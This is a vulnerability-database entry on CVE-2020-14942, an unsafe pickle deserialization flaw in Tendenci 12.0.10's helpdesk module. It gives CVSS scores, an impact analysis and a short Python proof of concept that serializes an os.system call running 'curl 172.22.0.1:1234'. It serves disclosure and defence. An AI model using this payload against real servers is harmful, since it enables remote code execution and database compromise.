Attacker Value
Low
(1 user assessed)
Exploitability
High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
0

CVE-2020-14942

Disclosure Date: June 21, 2020
CVE-2020-14942 CVSS v3 Base Score: 9.8
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Tendenci 12.0.10 allows unrestricted deserialization in apps\helpdesk\views\staff.py.

Add Assessment

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    High
Gives privileged accessAuthenticatedVulnerable in uncommon configuration
Technical Analysis

Outline

Untrusted data from the client side is used to create a python pickled object. This can lead to full RCE and compromise of the host. There are some limitations and this is not the default configuration.

Impact

If you can control the input it may be possible to gain code execution on the underlying server. With code execution you can gain full access to the database and its data.

Limitations

  • The helpdesk module is not enabled by default.
  • A valid authenticated account with permissions to access /tickets

Patch

This doesn’t not appear to be patched in the latest release, although it has been acknowledged

POC

It is fairly easy to create a functional POC against this target if the feature is enabled.

Modify the following POC to fit your needs.

import pickle
import base64
import os


class RCE:
    def __reduce__(self):
        cmd = ('curl 172.22.0.1:1234')
        return os.system, (cmd,)


if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(base64.urlsafe_b64encode(pickled))
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
n/a
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • tendenci

Products

  • tendenci 12.0.10

Additional Info

Authenticated
Unknown
Exploitable
Unknown
Reliability
Unknown
Stability
Unknown
Available Mitigations
Unknown
Shelf Life
Unknown
Userbase/Installbase
Unknown
Patch Effectiveness
Unknown
Technical Analysis